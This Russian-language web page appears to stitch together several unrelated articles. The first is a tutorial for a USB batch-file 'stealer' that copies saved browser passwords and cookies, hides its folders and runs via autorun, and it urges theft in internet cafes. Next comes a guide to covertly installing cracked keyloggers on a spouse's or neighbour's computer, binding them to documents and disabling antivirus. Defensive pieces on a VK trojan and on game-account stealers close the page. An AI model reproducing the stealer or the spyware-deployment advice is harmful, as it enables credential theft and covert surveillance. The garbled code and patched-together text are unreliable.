Программа для создания вируса ворующего пароли

Обновлено: 07.07.2024

Метод, который мы будем использовать имеет как плюсы, так и минусы, без этого никуда.

• Не ругается антивирус;
• Скорость работы;
• Простота в доработке;
• Возможность мгновенного запуска;
• Портативность.

• Autorun не работает на Windows 8+;
• Постоянное созданиеудаление autorun.inf;
• Личное присутствие;
• Только для Windows.

Стиллер паролей для браузеров на Windows | Разбор плюсов и минусов

Давайте разберемся, почему такие плюсы и минусы имеет наш стиллер паролей для браузеров.

Думаю первые пару пунктов в разборе не нуждаются, а вот простота в доработке, давайте посмотрим почему.

Ниже будет код программы, там видно, что стиллер крадет пароли из 3 браузеров, Opera, Mozilla, Chrome. Если вы захотите сделать его более объемным и добавить все браузеры, то вам нужно просто найти их директории и прописать пути.

Далее мгновенный запуск. Создаём файл autorun.inf и добавляем наш anyname.bat туда. Как только вы вставите флешку в ПК, произойдёт кража и её можно сразу вытаскивать. Это займет у секунду времени, однако тут сразу и минус. Autorun.inf не запускается на Windows 8+, так что придётся запускать батник вручную. Точнее сказать, автоматический запуск стал невозможен с последнего обновления безопасности Windows 7.

Создаём стиллер паролей для браузеров

Для того, чтобы создать портативный стиллер паролей для браузеров нам понадобится только блокнот.

Создаём текстовый документ и пишем туда следующий код:

d0Google
CD/D %APPDATA%OperaOpera
copy /y wand.dat %

d0Opera
copy /y coockies.dat %

d0Opera
cd %AppData%MozillaFirefoxProfiles*.def-ault
copy /y coockies.sqlite %

d0Mozilla
copy /y key3.db %

d0Mozilla
copy /y signons.sqlite %

d0Mozilla
copy /y AppData%MozillaFirefoxProfiles*.def-ault %

Вы же можете его просто скопировать, сохраняем файл как anyname.bat. В коде видно, что сохраняются пароли из Mozilla, Opera, Chrome. Если вы хотите добавить ещё браузеры, требуется найти их директории и таким же образом добавить. Атрибуты, которые мы присвоили делают созданные папки скрытыми, чтобы никто ничего не заподозрил.

Теперь нужно создать файл autorun.inf со следующей командой:

Готово, теперь можете идти куда душа пожелает и воровать пароли, например в интернет-кафе или тому подобные места. Наш стиллер паролей для браузеров не является удалённым, из-за чего придётся ходить.

Сегодня мы поговорили о том, как создать стиллер паролей для браузеров, обсудили плюсы и минусы такого скрипта. Если вам понравилась статья, подписывайтесь на обновления сайта, а также наш Telegram.

Воруем пароли или лучшие программы для слежения за компьютером соседа

Кто из нас не хотел почувствовать себя хоть раз кул-хакером и сломать хотя бы что-нибудь? :) Если даже и нет, то уж о том, как было бы здорово заполучить пароль от почты / соц. сети друга, жены / мужа, соседа по комнате думал хотя бы однажды каждый. :) Да и надо же с чего-то начинать, в конце-то концов! Существенная часть атак (взломов) включает в себя заражение компьютера жертвы так называемыми кейлоггерами (spyware).

Итак, в сегодняшней статье поговорим о том, какие есть бесплатные программы для слежения за компьютерами на базе windows, где можно скачать их полные версии, как заразить ими компьютер жертвы и в чём особенности их использования.

Но вначале небольшое введение.

Что такое и зачем нужны кейлоггеры?

О том, что это такое, думаю, Вы догадались и сами. Как правило, они представляют собой некую программу, которая скрыто (хотя это не всегда так) устанавливается на компьютер жертвы, после чего фиксирует абсолютно все нажатия на клавиатуре на данным узле. При этом помимо самих по себе нажатия обычно фиксируется: дата-время нажатия (действия) и программа, в которой эти действия были выполнены (браузер, в том числе адрес сайта (ура, сразу видим, от чего пароли!); локальное приложение; системные службы (в т.ч. пароли входа в windows) и т.д.).

Отсюда сразу видна одна из проблем: я заполучио на пару минут доступ к компьютеру своей соседки и хочу заполучить её пароль от ВК! Установил чудо-программку и вернул комп. Как же мне потом смотреть пароли? Снова искать способ забрать у неё комп? Есть приятная новость: как правило, нет. Большинство кейлоггеров способно не только хранить всю накопленную базу действий локально, но ещё и пересылать её удалённо. Вариантов отправки логов существует масса:

• Фикситрованный e-mail (может быть несколько) - самый удобный вариант;
• FTP-сервер (у кого он есть);
• SMB-сервер (экзотика, да и не очень удобно).
• Фиксированная флешка (вставляешь её в USB-порт компьютера жертвы, и все логи копируются туда автоматически в невидимом режиме!).

Зачем же всё это нужно? Думаю, ответ очевиден. Помимо банальной кражи паролей, некоторые кейлоггеры умеют ещё ряд приятный вещей:

• Логирование переписки в заданных соц. сетях или мессенджерах (напр, Skype).
• Съёмка скриншотов экрана.
• Просмотр / съемка данных с веб-камеры (что может быть очень интересно).

Как использовать кейлоггеры?

А это вопрос непростой. Надо понимать, что просто найти удобный функциональный хороший кейлоггер мало.

Итак, что же нужно для успешной работы программы-шпиона :

• Администраторский доступ к удалённому компьютеру.
  При чём это совсем не обязательно именно физический доступ. Вы вполне можете зайти туда через RDP (службу Удалённого рабочего стола); TeamViewer; AmmyAdmin и т.д.
  Как правило, с этим пунктом связаны самые большие сложности. Однако же я недавно писал статью о том, как получить права администратора в Windows.
• Анонимный e-mail / ftp (по которому Вас не вычислят).
  Конечно, если Вы ломаете соседу тётю Шуру, этот пункт можно смело опустить. Как и в случае, если у Вас компьютер жертвы всегда под рукой (аля, узнать пароли брата / сестры).
• Отсутствие рабочих антивирусов / внутренних систем защиты Windows.
  Большинство публичных кейлоггеров (о которых и пойдёт речь ниже) известны подавляющему большинству антивирусного ПО (хотя есть такие вирусы-логгеры, которые встраиваются в ядро ОС или системный драйвер, и антивирусы уже не могут их ни обнаружить, ни уничтожить, если даже обнаружили). В силу вышесказанного, антивирусное ПО, если таковое имеется, придётся безжалотсно уничтожить. Кроме антивирусов, опасность для нашей программы-шпиона представляют также системы типа Защитник Windows (таковые впервые появились в Windows 7 и далее). Они отлавливают подозрительную активность работающего на компьютере ПО. О том, как же от них избавиться можно без труда найти в гугле.

Вот, пожалуй, и все необходимые и достаточные условия Вашего успеха на поприще кражи чужих паролей / переписок / фото или на что там ещё Вам заблагорассудится посягнуть.

Чуть было не забыл главное! Будучи на рабочем месте, да и дома тоже, не забывайте обезопасить себя самого! Не используйтесь рабочий интернет-канал для поиска и скачивания вредоносного ПО и запросов типа: "как получить права доменного админа в корпоративной сети"! :) Вот моя статья о том, как остаться анонимным в Интернете.

Какие бывают программы-шпионы и где их скачать?

Итак, начнём обзор основных кейлоггеров, которые мне довелось использовать в своей повседневной практике со ссылками на бесплатное скачивание их полных версий (т.е. все версии последние на текущий момент (для которых реально найти лекарство) и с уже рабочими и испытанными кряками).

0. The Rat!

• Скрытность: 10
• Удобство / юзабилити: 9
• Функциональность: 8

Это просто бомба, а не кейлоггер! В рабочем состоянии занимает 15-20 КБ. Чего удивляться: он целиком написан на ассемблере (ветераны-программисты прослезились) и написан по большей части энтузиастами-хакерами, за счёт чего уровень его скрытности просто поражает воображение: работает он на уровне ядра ОС!

Кроме того, в комлект поставки входит FileConnector - мини-программа, позволяющая склеить данный кейлоггер с абсолютно любой прогой. В результате Вы получаете новый exe-шник практически того же размера, и работающий при запуске ровно так, как та програ, с которой Вы его склеили! Но после первого запуска Ваш кейлоггер будет автоматически установлен в невидимом режиме с заранее заданными Вами параметрами отсылки логов. Удобно, не правда ли?

Прекрасная возможность для социальной инженерии (приносите другу на флешке файл-игру / презентацию, да можно даже просто документ ворд (о том, как создать exe-ик, запускающий конкретный word/excel-файл расскажу в одной из следующий своих статей), запускаете, всё хорошо и прекрасно, однако же друг невидимо уже заражён!). Либо же просто шлёте этот файлик другу по почте (лучше ссылку на его скачивание, т.к. современные почтовые сервера запрещают отправку exe-файлов). Конечно, риск от антивирусов при установке всё же имеет место быть (зато его не будет после установки).

Кстати, при помощи некоторых других приёмов можно склеить любой дистрибутив скрытой установки (таковые есть в The Rat! и в Elite keylogger) не только с exe-файлами (которые у мало мальски продвинутых пользователей всё же вызывают подозрения), но и с обычными word / excel и даже pdf-файлами! Уж на простую pdf-ку никто никогда ничего не подумает, но не тут-то было! :) Как это делается - тема целой отдельной статьи. Особо ретивые могут написать мне вопросы через форму обратной связи. ;)

В общем, The Rat! можно описывать очень долго и много. Куда лучше меня это сделано вот здесь. Там же есть и ссылка на скачивание.

1. Elite keylogger

• Скрытность: 10
• Удобство / юзабилити: 9
• Функциональность: 8

Ссылка на скачивание: здесь

Однако же не стоит обольщаться слишком уж сильно. Сам инсталлер распознаётся антивирусами очень легко и для его установки потребуются и админовские права и отключение всех антивирусных служб и сервисов. После установки всё будет работать идеально в любом случае.

Кроме того, описанная особенность (работа на уровне ядра ОС) вносит требования по версия ОС, на которых кейлоггеров будет работать. Версия 5-5.3 (ссылки на которую приведены чуть ниже) поддерживает всё до Windows 7, включительно. Win 8 / 10, а также windows семейства server (2003 / 2008 / 2012) уже не поддерживаются. Есть версия 6, прекрасно функционирующая в т.ч. на win 8 и 10, однако найти крякнутую версию на текущий момент не представляется возможным. Вероятно, в будущем она появится. А пока же скачать Elite keylogger 5.3 можно по ссылке выше.

Нет режима сетевой работы, посему для использования работодателями (для слежения за компьютерами своих сотрудников) или целой группы лиц не подойдёт.

Важным моментом является возможность создания установочного дистрибутива с предзаданными настройками (к примеру, с заданным адресом почты, куда нужно будет слать логи). При этом на выходе Вы получаете дистрибутив, которые при запуске не выдаёт абсолютно никаких предупреждений или окон, а после установки может даже уничтожить себя сам (если отметить соответствующую опцию).

Несколько скринов 5-ой версии (дабы показать, на сколько всё красиво и удобно):

2. All-in-one keylogger.

• Скрытность: 3
• Удобство / юзабилити: 9
• Функциональность: 8

Также весьма и весьма удобная штуковина. Функционал вполне себе на уровне Elite keylogger-а. Вот со скрытностью дела по-хуже. Winlogon-пароли уже не перехыватываются, драйвером он не является, в ядро не встраивается. Однако же устанавливается в системные и скрытые AppData-директории, до которых не так легко добраться посторонним пользователям (не тем, от имени которых он установлен). Тем не менее антивирусы рано или поздно с успехом это делают, что делает эту вещь не особенно-то надёжной и безопасной при использовании, к примеру, у вас на работе для слежки за собственным начальством. ;) Склеить с чем-нибудь или же закриптовать код для сокрытия от антивирусов не получится.

Работает на любых версиях ОС Win (что приятно и практично).

Что же касается остального, всё прекрасно: логирует всё (кроме паролей на вход в Windows), пересылает куда угодно (включая e-mail, ftp, фиксированную флешку). По удобство также всё прекрасно.

3. Spytech SpyAgent.

• Скрытность: 4
• Удобство / юзабилити: 8
• Функциональность: 10

Также неплохой кейлоггер, хотя и с сомнительной скрытностью. Поддерживаемые версии ОС также все возможные. Функционал схож с предыдущими вариантами. Есть интересная функция самоуничтожения после заданного периода времени (либо по достижении заранее заданной даты).

Кроме того, возможна запись видео с веб-камеры и звука из микрофона, что также может быть очень востребовано и чего нет у предыдущих двух представителей.

Есть сетевой режим работы, что удобно для слежения за целой сетью компьютеров. Он же, кстати, есть у StaffCop (в обзор не включён по причине бесполезности для одного пользователя - физ. лица). Пожалуй, эта программа идеально подойдёт работодателям для слежки за своими сотрудниками (хотя лидер в этом поприще безоговорочно StaffCop и LanAgent - если Вы - юр. лицо, обязательно посмотрите в их сторону). Либо же для слежения за Вашим потомством, любящим посидеть за просмотром "сайтов для взрослых". Т.е. там, где нужна более не скрытость, а удобство (в т.ч. куча красивых журналов-отчётов и т.д.) и функционал блокировки заданных сайтов / программ (в SpyAgent он также имеется).

4. Spyrix Personal monitor.

• Скрытность: 4
• Удобство / юзабилити: 6
• Функциональность: 10

Функционал на уровне предыдущего кандидата, однако те же проблемы со скрытностью. Кроме того, в функционал входит интересная вещь: копирование файлов со вставляемых в компьютер USB-носителей, а также удалённый просмотр логов через веб-аккаунт на сайте Spyrix (но мы же собираемся скачать крякнутую версию, посему оно для нас работать не будет).

5. Spyrix Personal monitor.

• Скрытность: 3
• Удобство / юзабилити: 6
• Функциональность: 8

Подробно описывать не буду, т.к. данный экземпляр не имеет ничего из того, чего бы не было у одного из предыдущих шпионов, однако же кому-то данный кейлоггер может прийтись по душе (как минимум, своим интерфейсом).

Что имеем в итоге?

Вопрос использования кейлоггера в большей мере этический, чем технический, и он сильно зависит от Ваших целей.

Если Вы - работодатель, желающий контролировать своих сотрудников, смело ставьте StaffCop, собирайте со всех сотрудников письменные разрешения на таковые действа (иначе за такие дела Вас могут неслабо привлечь) и дело в шляпе. Хотя я лично знаю и более эффективные способы повышения работоспособности своих сотрудников.

Если же Вы - начинающий IT-специалист, желающий просто испытать, каково оно - кого-то поломать - и как вообще это дело работает, то вооружайтесь методами социальной инженерии и проводите испытания на своих друзьях, используя любой из приведённых примеров. Однако же помните: выявление такой активности жертвами отнюдь не способствует дружбе и долголетию. ;) И уж точно не стоит проверять это на своей работе. Попомните мои слова: у меня в этом есть опыт. ;)

Если же Ваша цель - прошпионить за подругой, мужем, соседом, а может, и вовсе делаете это регулярно и за деньги, хорошо подумайте, стоит ли. Ведь рано или поздно могут привлечь. Да и не стоит оно того: "рыться в чужом грязном белье - удовольствие не из приятных". Если всё же надо (а может, Вы работаете в сфере расследования компьютерных преступлений и такие задачи входят в Ваши профессиональные обязанности), то варианта только два: The Rat! и Elite Keylogger. В режиме скрытых установочных дистрибутивов, склеенных с word / excel / pdf. И лучше, по возможности, закриптованных свежим криптором. Только в этом случае можно гарантировать более менее безопасную деятельность и реальных успех.

Но в любом случае стоит помнить, что грамотное применение кейлоггеров - это лишь одно маленькое звено в достижении цели (в т.ч. даже простой атаки). Не всегда есть админовские права, не всегда есть физический доступ и не все юзеры будут открывать, читать и уж тем более качать Ваши вложения / ссылки (привет соц. инженерии), не всегда будет отключён антивирус / Ваш кейлоггер / криптор не всегда будет ему неизвестен. Все эти и многие из несказанных проблем решаемы, но их решение - тема целой серии отдельных статей.

Словом, Вы только начали погружаться в сложный, опасный, но безумно интересный мир информационной безопасности. :)

Краткое описание
Троянская программа mvk.exe не попадает на компьютер без ведома пользователя, как это бывает с другими. Пользователь сам скачивает и запускает его т.к. думает, что это другая программа (для взлома контакта). Простенькая социальная инженерия :)

А теперь конкретнее. Файлы:
%WinDir%\activate.exe
%System%\loio.jho
%TMP%\2.tmp
%TMP%\3.tmp
%TMP%\4.tmp
%StartDir%\Quick Office.lnk

И реестр:
Ветка - HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\, параметр - Shell, его значение - Explorer.exe rundll32.exe loio.jho soalsv. А должно быть просто - Explorer.exe.

Как лечить
Загрузиться в безопасном режиме (жать F8 после включения компа). Открыть диспетчер задач (Ctrl+Alt+Del или Ctrl+Shift+Esc) и "убить" процесс "activate.exe", если таковой имеется. Потом удалить файлы C:\Windows\activate.exe и C:\Windows\System32\loio.jho, удалить ярлык из папки Автозагрузка (Пуск -> Программы -> Автозагрузка) и удалить все файлы из временной папки пользователя (обычно C:\Documents and Settings\ИМЯ_ПОЛЬЗОВАТЕЛЯ\Local Settings\Temp). Открыть редактор реестра (Пуск -> Выполнить. ввести regedit и нажать ОК), перейти в ветку HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\, найти параметр Shell, дважды щелкнуть по нему мышкой и заменить его значение на "Explorer.exe" (без кавычек). Т.ж. нужно перейти в папку C:\Windows\System32\Drivers\etc\, открыть файл hosts в блокноте и удалить из него все строки за исключением "127.0.0.1 localhost".

Вы так же можете скачать мою программку для удаления этого вируса - anti_mvk.exe. После запуска anti_mvk.exe и нажатия кнопку "Лечить" исчезнет рабочий стол, а потом компьютер будет перезагружен, поэтому предварительно лучше закрыть все открытые программы для предотвращения утери не сохраненной информации.
ВАЖНО. Утила не сообщает есть ли троян или нет, а тупо пытается вычистить все, что может указывать на наличие трояна в системе, поэтому перезагрузка произдойдет не зависимо от того, есть ли троян или нет.

Краткая техническая информация для IT'шников
В этом разделе кратко опишу как я его анализировал. Может кому будет интересно. Размер файла 19456 байт. MD5-хэш - d5dbd34b12eb653d07ec17287fd3f26c. Судя по всему, написан на Delphi и упакован UPX'ом.
Как уже говорил, спам был в виде граффити на моей стенке в контакте, там была нарисована "ссылка" на vk-****.msk.ru. Если зайти на этот адрес, то происходил редирект на http://vk****-****.blogspot.com/ и уже в этом блоге предлагают скачать этот самый троян, под видом программы для взлома аккаунтов контакта и "включить защиту от взлома своей анкеты" (от последнего чуть под стол не свалился).
В анализе участвовали след. утилиты:
Autoruns - Позволяет определить, какие приложения запускаются автоматически при загрузке системы и выполнении входа в систему. Также показывает полный перечень путей в реестре и на диске, где может быть настроен автоматический запуск приложений.
Process Explorer - Отображает файлы, разделы реестра, библиотеки DLL и прочие объекты, открытые или загруженные различными процессами, а также другую информацию, включая владельца процесса.
AVZ4 - Очень хорошая утилита, помогающая исследовать систему (ВАЖНО. В кривых руках может загубить систему. ).
VirtualBox - виртуальная машина, на ней я исследовал (запускал) вирус.

Для начала запустил Autoruns, подождал пока он отработает и сохранил список. Потом перешел к AVZ4. В нем задействовал функции "Исследование системы", "Резервное копирование" и "Ревизор". После чего запустил Process Explorer, чтобы можно было видеть какие дополнительные (под)процессы запускает троян. Положил на рабочий стол и запустил файл трояна, Process Explorer тут же был закрыт, поэтому я не смог увидеть то, что хотел. Файл трояна с рабочего стола исчез (удалился). Через пару секунд появилось окно трояна, о котором говорилось во втором разделе поста. Снова запустил Process Explorer и увидел от моего имени запущенные процессы svchost.exe и 4.tmp. Первый - родной процесс (файл) винды и запущен был из %System%. Зачем его запустил троян, не знаю, не разбирался. Второй это компонент трояна. Закрыл окно трояна.
Снова запустил Autoruns и AVZ4 и повторил те действия, которые делал до запуска трояна. После чего перезагрузился в безопасный режим и снова повторил эти действия. Далее скинул полученные файлы-отчеты себе на хоста машину (Linux Ubuntu 9.10 Desktop) и уже на ней произвел анализ этих логов (отчетов).
На основе анализа логов, т.е. их сравнении, выяснилось то, что было описано во втором разделе данного поста. Компоненты трояна анализировать не стал. Вот скрины с сайта VirusTotal, на которых видно, как и какие антивири идентифицируют троян и его компоненты (NOD32 меня просто убил своей реакцией на ярлык о_О ) на данный момент, если кому интересно:

Мы часто рассказываем, какое количество угроз в онлайне существует для геймеров: и в пиратках трояны прячутся, и в модах, и в читах. И это не говоря уже про фишинг и многочисленные способы обмана при покупке или обмене внутриигровых предметов. Про беды с покупкой аккаунтов мы тоже недавно рассказывали. К счастью, все эти проблемы не так страшны, если вы о них знаете.

Но есть еще одна опасность, о которой нужно, во-первых, знать, а во-вторых, уметь от нее защищаться. И имя ей — стилеры (Password Stealer, наши защитные решения их детектируют обычно как Trojan-PSW.что-нибудь). Это такие специальные трояны, которые заточены под воровство аккаунтов — или в виде логинов с паролями, или в виде токенов сессии.

Что такое Password Stealer и какие они бывают

Работают стилеры по-разному. Например, есть злобный троян-стилер Kpot (также известный как Trojan-PSW.Win32.Kpot). Он распространяется в основном через почтовый спам с вложениями, которые, используя уязвимости (например, в Microsoft Office), загружают на компьютер сам зловред.

Дальше стилер передает на командный сервер информацию об установленных на компьютере программах и в ответ получает список дальнейших действий. Среди них, например, возможность воровать cookie-файлы, аккаунты Telegram и Skype, а также много чего еще.

Зачем это надо мошенникам? Очень просто: все ценные внутриигровые предметы они быстренько перепродадут, выручив с этого неплохие деньги. Такие предметы — и возможность их перепродать — есть, например, в World of Warcraft и в Diablo III.

Или, скажем, есть зловред, который целится в другой сервис — Uplay, фирменный лончер для игр Ubisoft. Этого зловреда зовут Okasidis, наши решения ловят его под общим вердиктом Trojan-Banker.MSIL.Evital.gen. В отношении воровства игровых аккаунтов он ведет себя точно так же, как троян Kpot, разве что ворует два конкретных файла — %LOCALAPPDATA%\Ubisoft Game Launcher\users.dat и %LOCALAPPDATA%\Ubisoft Game Launcher\settings.yml.

Тот же Uplay интересует и зловреда по имени Thief Stealer (детектируется под общим вердиктом — как HEUR:Trojan.Win32.Generic). Разве что этот, не стесняясь, тащит вообще все файлы из папки %LOCALAPPDATA%\Ubisoft Game Launcher\.

Во всех трех случаях пользователь, скорее всего, ничего не заметит — троян никак не выдает себя на компьютере, не выводит окон с требованиями, а просто тихонько ворует файлы или данные.

Как защититься от троянов, ворующих аккаунты в игровых сервисах

В принципе защищать аккаунты в игровых сервисах нужно так же, как и все остальное. В том числе и от стилеров. Следуйте советам ниже — и никакие троянские воры будут вам не страшны:

Читайте также:

  
• Сколько существует видов адресации ячеек в excel 97
  
• Как связать ячейки в excel на одном листе для сортировки
  
• Ошибка переименования файлов 1с
  
• Adobe digital editions как конвертировать в pdf
  
• В 1с не удерживается ндфл с больничного листа в